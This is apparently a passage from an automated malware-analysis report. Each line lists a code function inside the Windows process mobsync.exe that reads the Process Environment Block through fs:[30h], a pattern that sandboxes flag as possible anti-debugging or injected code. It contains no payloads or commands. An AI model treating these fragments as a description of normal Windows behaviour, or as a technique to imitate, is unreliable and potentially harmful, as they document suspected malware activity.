Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7A44B mov eax, dword ptr fs:[00000030h]	5_2_04A7A44B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04ADC450 mov eax, dword ptr fs:[00000030h]	5_2_04ADC450
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04ADC450 mov eax, dword ptr fs:[00000030h]	5_2_04ADC450
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A735A1 mov eax, dword ptr fs:[00000030h]	5_2_04A735A1
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A71DB5 mov eax, dword ptr fs:[00000030h]	5_2_04A71DB5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A71DB5 mov eax, dword ptr fs:[00000030h]	5_2_04A71DB5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A71DB5 mov eax, dword ptr fs:[00000030h]	5_2_04A71DB5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B105AC mov eax, dword ptr fs:[00000030h]	5_2_04B105AC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B105AC mov eax, dword ptr fs:[00000030h]	5_2_04B105AC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A72581 mov eax, dword ptr fs:[00000030h]	5_2_04A72581
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A72581 mov eax, dword ptr fs:[00000030h]	5_2_04A72581
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A72581 mov eax, dword ptr fs:[00000030h]	5_2_04A72581
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A72581 mov eax, dword ptr fs:[00000030h]	5_2_04A72581
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A42D8A mov eax, dword ptr fs:[00000030h]	5_2_04A42D8A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A42D8A mov eax, dword ptr fs:[00000030h]	5_2_04A42D8A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A42D8A mov eax, dword ptr fs:[00000030h]	5_2_04A42D8A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A42D8A mov eax, dword ptr fs:[00000030h]	5_2_04A42D8A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A42D8A mov eax, dword ptr fs:[00000030h]	5_2_04A42D8A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7FD9B mov eax, dword ptr fs:[00000030h]	5_2_04A7FD9B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7FD9B mov eax, dword ptr fs:[00000030h]	5_2_04A7FD9B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5D5E0 mov eax, dword ptr fs:[00000030h]	5_2_04A5D5E0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5D5E0 mov eax, dword ptr fs:[00000030h]	5_2_04A5D5E0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]	5_2_04B0FDE2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]	5_2_04B0FDE2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]	5_2_04B0FDE2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]	5_2_04B0FDE2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AF8DF1 mov eax, dword ptr fs:[00000030h]	5_2_04AF8DF1
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]	5_2_04AC6DC9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]	5_2_04AC6DC9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]	5_2_04AC6DC9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC6DC9 mov ecx, dword ptr fs:[00000030h]	5_2_04AC6DC9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]	5_2_04AC6DC9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]	5_2_04AC6DC9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B18D34 mov eax, dword ptr fs:[00000030h]	5_2_04B18D34
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0E539 mov eax, dword ptr fs:[00000030h]	5_2_04B0E539
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A53D34 mov eax, dword ptr fs:[00000030h]	5_2_04A53D34
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A53D34 mov eax, dword ptr fs:[00000030h]	5_2_04A53D34
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A53D34 mov eax, dword ptr fs:[00000030h]	5_2_04A53D34
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A53D34 mov eax, dword ptr fs:[00000030h]	5_2_04A53D34
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A53D34 mov eax, dword ptr fs:[00000030h]	5_2_04A53D34
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A53D34 mov eax, dword ptr fs:[00000030h]	5_2_04A53D34
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A53D34 mov eax, dword ptr fs:[00000030h]	5_2_04A53D34
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A53D34 mov eax, dword ptr fs:[00000030h]	5_2_04A53D34
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A53D34 mov eax, dword ptr fs:[00000030h]	5_2_04A53D34
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A53D34 mov eax, dword ptr fs:[00000030h]	5_2_04A53D34
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A53D34 mov eax, dword ptr fs:[00000030h]	5_2_04A53D34
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A53D34 mov eax, dword ptr fs:[00000030h]	5_2_04A53D34
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A53D34 mov eax, dword ptr fs:[00000030h]	5_2_04A53D34
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4AD30 mov eax, dword ptr fs:[00000030h]	5_2_04A4AD30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04ACA537 mov eax, dword ptr fs:[00000030h]	5_2_04ACA537
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A74D3B mov eax, dword ptr fs:[00000030h]	5_2_04A74D3B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A74D3B mov eax, dword ptr fs:[00000030h]	5_2_04A74D3B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A74D3B mov eax, dword ptr fs:[00000030h]	5_2_04A74D3B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6C577 mov eax, dword ptr fs:[00000030h]	5_2_04A6C577
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6C577 mov eax, dword ptr fs:[00000030h]	5_2_04A6C577
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A83D43 mov eax, dword ptr fs:[00000030h]	5_2_04A83D43
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC3540 mov eax, dword ptr fs:[00000030h]	5_2_04AC3540
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AF3D40 mov eax, dword ptr fs:[00000030h]	5_2_04AF3D40
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A67D50 mov eax, dword ptr fs:[00000030h]	5_2_04A67D50
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC46A7 mov eax, dword ptr fs:[00000030h]	5_2_04AC46A7
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B10EA5 mov eax, dword ptr fs:[00000030h]	5_2_04B10EA5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B10EA5 mov eax, dword ptr fs:[00000030h]	5_2_04B10EA5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B10EA5 mov eax, dword ptr fs:[00000030h]	5_2_04B10EA5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04ADFE87 mov eax, dword ptr fs:[00000030h]	5_2_04ADFE87
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A716E0 mov ecx, dword ptr fs:[00000030h]	5_2_04A716E0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A576E2 mov eax, dword ptr fs:[00000030h]	5_2_04A576E2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B18ED6 mov eax, dword ptr fs:[00000030h]	5_2_04B18ED6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A736CC mov eax, dword ptr fs:[00000030h]	5_2_04A736CC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AFFEC0 mov eax, dword ptr fs:[00000030h]	5_2_04AFFEC0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A88EC7 mov eax, dword ptr fs:[00000030h]	5_2_04A88EC7
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4E620 mov eax, dword ptr fs:[00000030h]	5_2_04A4E620
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AFFE3F mov eax, dword ptr fs:[00000030h]	5_2_04AFFE3F
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4C600 mov eax, dword ptr fs:[00000030h]	5_2_04A4C600
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4C600 mov eax, dword ptr fs:[00000030h]	5_2_04A4C600
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4C600 mov eax, dword ptr fs:[00000030h]	5_2_04A4C600
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A78E00 mov eax, dword ptr fs:[00000030h]	5_2_04A78E00
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01608 mov eax, dword ptr fs:[00000030h]	5_2_04B01608
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7A61C mov eax, dword ptr fs:[00000030h]	5_2_04A7A61C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7A61C mov eax, dword ptr fs:[00000030h]	5_2_04A7A61C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5766D mov eax, dword ptr fs:[00000030h]	5_2_04A5766D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6AE73 mov eax, dword ptr fs:[00000030h]	5_2_04A6AE73
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6AE73 mov eax, dword ptr fs:[00000030h]	5_2_04A6AE73
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6AE73 mov eax, dword ptr fs:[00000030h]	5_2_04A6AE73
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6AE73 mov eax, dword ptr fs:[00000030h]	5_2_04A6AE73
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6AE73 mov eax, dword ptr fs:[00000030h]	5_2_04A6AE73
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A57E41 mov eax, dword ptr fs:[00000030h]	5_2_04A57E41
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A57E41 mov eax, dword ptr fs:[00000030h]	5_2_04A57E41
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A57E41 mov eax, dword ptr fs:[00000030h]	5_2_04A57E41
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A57E41 mov eax, dword ptr fs:[00000030h]	5_2_04A57E41
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A57E41 mov eax, dword ptr fs:[00000030h]	5_2_04A57E41
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A57E41 mov eax, dword ptr fs:[00000030h]	5_2_04A57E41
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0AE44 mov eax, dword ptr fs:[00000030h]	5_2_04B0AE44
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0AE44 mov eax, dword ptr fs:[00000030h]	5_2_04B0AE44
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A58794 mov eax, dword ptr fs:[00000030h]	5_2_04A58794
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC7794 mov eax, dword ptr fs:[00000030h]	5_2_04AC7794
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC7794 mov eax, dword ptr fs:[00000030h]	5_2_04AC7794
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC7794 mov eax, dword ptr fs:[00000030h]	5_2_04AC7794
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A837F5 mov eax, dword ptr fs:[00000030h]	5_2_04A837F5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A44F2E mov eax, dword ptr fs:[00000030h]	5_2_04A44F2E
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A44F2E mov eax, dword ptr fs:[00000030h]	5_2_04A44F2E
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7E730 mov eax, dword ptr fs:[00000030h]	5_2_04A7E730
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6B73D mov eax, dword ptr fs:[00000030h]	5_2_04A6B73D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6B73D mov eax, dword ptr fs:[00000030h]	5_2_04A6B73D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7A70E mov eax, dword ptr fs:[00000030h]	5_2_04A7A70E
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7A70E mov eax, dword ptr fs:[00000030h]	5_2_04A7A70E
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6F716 mov eax, dword ptr fs:[00000030h]	5_2_04A6F716
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B1070D mov eax, dword ptr fs:[00000030h]	5_2_04B1070D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B1070D mov eax, dword ptr fs:[00000030h]	5_2_04B1070D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04ADFF10 mov eax, dword ptr fs:[00000030h]	5_2_04ADFF10
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04ADFF10 mov eax, dword ptr fs:[00000030h]	5_2_04ADFF10
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5FF60 mov eax, dword ptr fs:[00000030h]	5_2_04A5FF60
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B18F6A mov eax, dword ptr fs:[00000030h]	5_2_04B18F6A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5EF40 mov eax, dword ptr fs:[00000030h]	5_2_04A5EF40
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A890AF mov eax, dword ptr fs:[00000030h]	5_2_04A890AF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A720A0 mov eax, dword ptr fs:[00000030h]	5_2_04A720A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A720A0 mov eax, dword ptr fs:[00000030h]	5_2_04A720A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A720A0 mov eax, dword ptr fs:[00000030h]	5_2_04A720A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A720A0 mov eax, dword ptr fs:[00000030h]	5_2_04A720A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A720A0 mov eax, dword ptr fs:[00000030h]	5_2_04A720A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A720A0 mov eax, dword ptr fs:[00000030h]	5_2_04A720A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7F0BF mov ecx, dword ptr fs:[00000030h]	5_2_04A7F0BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7F0BF mov eax, dword ptr fs:[00000030h]	5_2_04A7F0BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7F0BF mov eax, dword ptr fs:[00000030h]	5_2_04A7F0BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A49080 mov eax, dword ptr fs:[00000030h]	5_2_04A49080
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC3884 mov eax, dword ptr fs:[00000030h]	5_2_04AC3884
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC3884 mov eax, dword ptr fs:[00000030h]	5_2_04AC3884
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6B8E4 mov eax, dword ptr fs:[00000030h]	5_2_04A6B8E4
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6B8E4 mov eax, dword ptr fs:[00000030h]	5_2_04A6B8E4
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A440E1 mov eax, dword ptr fs:[00000030h]	5_2_04A440E1
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A440E1 mov eax, dword ptr fs:[00000030h]	5_2_04A440E1
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A440E1 mov eax, dword ptr fs:[00000030h]	5_2_04A440E1
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A458EC mov eax, dword ptr fs:[00000030h]	5_2_04A458EC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]	5_2_04ADB8D0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04ADB8D0 mov ecx, dword ptr fs:[00000030h]	5_2_04ADB8D0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]	5_2_04ADB8D0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]	5_2_04ADB8D0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]	5_2_04ADB8D0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]	5_2_04ADB8D0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7002D mov eax, dword ptr fs:[00000030h]	5_2_04A7002D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7002D mov eax, dword ptr fs:[00000030h]	5_2_04A7002D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7002D mov eax, dword ptr fs:[00000030h]	5_2_04A7002D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7002D mov eax, dword ptr fs:[00000030h]	5_2_04A7002D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7002D mov eax, dword ptr fs:[00000030h]	5_2_04A7002D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5B02A mov eax, dword ptr fs:[00000030h]	5_2_04A5B02A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5B02A mov eax, dword ptr fs:[00000030h]	5_2_04A5B02A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5B02A mov eax, dword ptr fs:[00000030h]	5_2_04A5B02A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5B02A mov eax, dword ptr fs:[00000030h]	5_2_04A5B02A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6A830 mov eax, dword ptr fs:[00000030h]	5_2_04A6A830
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6A830 mov eax, dword ptr fs:[00000030h]	5_2_04A6A830
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6A830 mov eax, dword ptr fs:[00000030h]	5_2_04A6A830
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6A830 mov eax, dword ptr fs:[00000030h]	5_2_04A6A830
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B14015 mov eax, dword ptr fs:[00000030h]	5_2_04B14015
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B14015 mov eax, dword ptr fs:[00000030h]	5_2_04B14015
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC7016 mov eax, dword ptr fs:[00000030h]	5_2_04AC7016
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC7016 mov eax, dword ptr fs:[00000030h]	5_2_04AC7016
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC7016 mov eax, dword ptr fs:[00000030h]	5_2_04AC7016
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B02073 mov eax, dword ptr fs:[00000030h]	5_2_04B02073
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B11074 mov eax, dword ptr fs:[00000030h]	5_2_04B11074
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A60050 mov eax, dword ptr fs:[00000030h]	5_2_04A60050
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A60050 mov eax, dword ptr fs:[00000030h]	5_2_04A60050
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A761A0 mov eax, dword ptr fs:[00000030h]	5_2_04A761A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A761A0 mov eax, dword ptr fs:[00000030h]	5_2_04A761A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC69A6 mov eax, dword ptr fs:[00000030h]	5_2_04AC69A6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC51BE mov eax, dword ptr fs:[00000030h]	5_2_04AC51BE
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC51BE mov eax, dword ptr fs:[00000030h]	5_2_04AC51BE
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC51BE mov eax, dword ptr fs:[00000030h]	5_2_04AC51BE
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC51BE mov eax, dword ptr fs:[00000030h]	5_2_04AC51BE
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B049A4 mov eax, dword ptr fs:[00000030h]	5_2_04B049A4
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B049A4 mov eax, dword ptr fs:[00000030h]	5_2_04B049A4
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B049A4 mov eax, dword ptr fs:[00000030h]	5_2_04B049A4
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B049A4 mov eax, dword ptr fs:[00000030h]	5_2_04B049A4
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A699BF mov ecx, dword ptr fs:[00000030h]	5_2_04A699BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A699BF mov ecx, dword ptr fs:[00000030h]	5_2_04A699BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A699BF mov eax, dword ptr fs:[00000030h]	5_2_04A699BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A699BF mov ecx, dword ptr fs:[00000030h]	5_2_04A699BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A699BF mov ecx, dword ptr fs:[00000030h]	5_2_04A699BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A699BF mov eax, dword ptr fs:[00000030h]	5_2_04A699BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A699BF mov ecx, dword ptr fs:[00000030h]	5_2_04A699BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A699BF mov ecx, dword ptr fs:[00000030h]	5_2_04A699BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A699BF mov eax, dword ptr fs:[00000030h]	5_2_04A699BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A699BF mov ecx, dword ptr fs:[00000030h]	5_2_04A699BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A699BF mov ecx, dword ptr fs:[00000030h]	5_2_04A699BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A699BF mov eax, dword ptr fs:[00000030h]	5_2_04A699BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7A185 mov eax, dword ptr fs:[00000030h]	5_2_04A7A185
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6C182 mov eax, dword ptr fs:[00000030h]	5_2_04A6C182
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A72990 mov eax, dword ptr fs:[00000030h]	5_2_04A72990
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AD41E8 mov eax, dword ptr fs:[00000030h]	5_2_04AD41E8
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4B1E1 mov eax, dword ptr fs:[00000030h]	5_2_04A4B1E1
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4B1E1 mov eax, dword ptr fs:[00000030h]	5_2_04A4B1E1
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4B1E1 mov eax, dword ptr fs:[00000030h]	5_2_04A4B1E1
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A64120 mov eax, dword ptr fs:[00000030h]	5_2_04A64120
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A64120 mov eax, dword ptr fs:[00000030h]	5_2_04A64120
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A64120 mov eax, dword ptr fs:[00000030h]	5_2_04A64120
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A64120 mov eax, dword ptr fs:[00000030h]	5_2_04A64120
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A64120 mov ecx, dword ptr fs:[00000030h]	5_2_04A64120
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7513A mov eax, dword ptr fs:[00000030h]	5_2_04A7513A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7513A mov eax, dword ptr fs:[00000030h]	5_2_04A7513A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A49100 mov eax, dword ptr fs:[00000030h]	5_2_04A49100
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A49100 mov eax, dword ptr fs:[00000030h]	5_2_04A49100
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A49100 mov eax, dword ptr fs:[00000030h]	5_2_04A49100
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4C962 mov eax, dword ptr fs:[00000030h]	5_2_04A4C962
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4B171 mov eax, dword ptr fs:[00000030h]	5_2_04A4B171
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4B171 mov eax, dword ptr fs:[00000030h]	5_2_04A4B171
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6B944 mov eax, dword ptr fs:[00000030h]	5_2_04A6B944
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6B944 mov eax, dword ptr fs:[00000030h]	5_2_04A6B944
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A452A5 mov eax, dword ptr fs:[00000030h]	5_2_04A452A5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A452A5 mov eax, dword ptr fs:[00000030h]	5_2_04A452A5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A452A5 mov eax, dword ptr fs:[00000030h]	5_2_04A452A5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A452A5 mov eax, dword ptr fs:[00000030h]	5_2_04A452A5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A452A5 mov eax, dword ptr fs:[00000030h]	5_2_04A452A5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5AAB0 mov eax, dword ptr fs:[00000030h]	5_2_04A5AAB0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5AAB0 mov eax, dword ptr fs:[00000030h]	5_2_04A5AAB0
